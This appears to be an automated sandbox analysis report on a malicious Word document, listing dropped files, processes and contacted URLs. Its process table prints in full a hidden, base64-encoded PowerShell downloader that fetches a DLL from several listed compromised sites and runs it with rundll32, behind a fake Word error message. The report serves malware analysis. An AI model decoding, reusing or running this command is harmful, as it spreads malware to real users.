Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
N00048481397007.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Non sed natus asperiores.
Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia., Author: Gabriel Villaseor, Revision Number:
1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 08:47:00 2021, Last Saved Time/Date:
Mon Jan 25 08:47:00 2021, Number of Pages: 1, Number of Words: 5614, Number of Characters: 32003, Security: 8
|
initial sample
|
||
C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 58936 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F20-30CA-4646-ACFF-79FC9E14ADCB}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ED51AD77-1C4D-48D3-B650-0535282218FE}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Cab148B.tmp
|
Microsoft Cabinet archive data, 58936 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Tar148C.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\N00048481397007.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15
2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Jan 26 03:10:39 2021, length=143360, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ATCH18MFTYSDMR3EQ34.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$0048481397007.doc
|
data
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 13 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nightlifemumbai.club/x/0wBD3/
|
172.217.6.174
|
||
http://nightlifemumbai.club
|
unknown
|
||
http://traumfrauen-ukraine.de/bin/JyeS/
|
212.227.200.73
|
||
http://traumfrauen-ukraine.de
|
unknown
|
||
https://shop.nowfal.dev/wp-includes/RlMObf2j0/
|
unknown
|
||
http://190.55.186.229/pvaadnb3/
|
190.55.186.229
|
||
https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
|
unknown
|
||
https://jflmktg.wpcomstaging.com/wp-content/AK/
|
unknown
|
||
https://shop.nowfal.dev
|
unknown
|
||
http://e-wdesign.eu/wp-content/bn1IgDejh/
|
unknown
|
||
http://www.a-cert.at0E
|
unknown
|
||
http://www.certplus.com/CRL/class3.crl0
|
unknown
|
||
http://www.e-me.lv/repository0
|
unknown
|
||
http://www.acabogacia.org/doc0
|
unknown
|
||
http://crl.chambersign.org/chambersroot.crl0
|
unknown
|
||
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
|
unknown
|
||
http://www.certifikat.dk/repository0
|
unknown
|
||
http://www.chambersign.org1
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://repository.swisssign.com/0
|
unknown
|
||
http://crl.ssc.lt/root-c/cacrl.crl0
|
unknown
|
||
https://traumfrauen-ukraine.de
|
unknown
|
||
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
|
unknown
|
||
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
|
unknown
|
||
http://ca.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://www.certplus.com/CRL/class3P.crl0
|
unknown
|
||
http://repository.infonotary.com/cps/qcps.html0$
|
unknown
|
||
http://www.post.trust.ie/reposit/cps.html0
|
unknown
|
||
http://www.certplus.com/CRL/class2.crl0
|
unknown
|
||
http://www.disig.sk/ca/crl/ca_disig.crl0
|
unknown
|
||
http://ocsp.infonotary.com/responder.cgi0V
|
unknown
|
||
http://www.globaltrust.info0=
|
unknown
|
||
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
|
unknown
|
||
http://servername/isapibackend.dll
|
unknown
|
||
http://www.valicert.1
|
unknown
|
||
http://www.ssc.lt/cps03
|
unknown
|
||
http://ocsp.sectigo.com0/
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
|
unknown
|
||
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
|
unknown
|
||
http://ocsp.pki.gva.es0
|
unknown
|
||
http://crl.oces.certifikat.dk/oces.crl0
|
unknown
|
||
http://crl.ssc.lt/root-b/cacrl.crl0
|
unknown
|
||
http://www.certicamara.com/dpc/0Z
|
unknown
|
||
http://crl.pki.wellsfargo.com/wsprca.crl0
|
unknown
|
||
http://www.dnie.es/dpc0
|
unknown
|
||
http://www.rootca.or.kr/rca/cps.html0
|
unknown
|
||
http://www.trustcenter.de/guidelines0
|
unknown
|
||
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.globaltrust.info0
|
unknown
|
||
http://certificates.starfieldtech.com/repository/1604
|
unknown
|
||
http://www.entrust.net/CRL/Client1.crl0
|
unknown
|
||
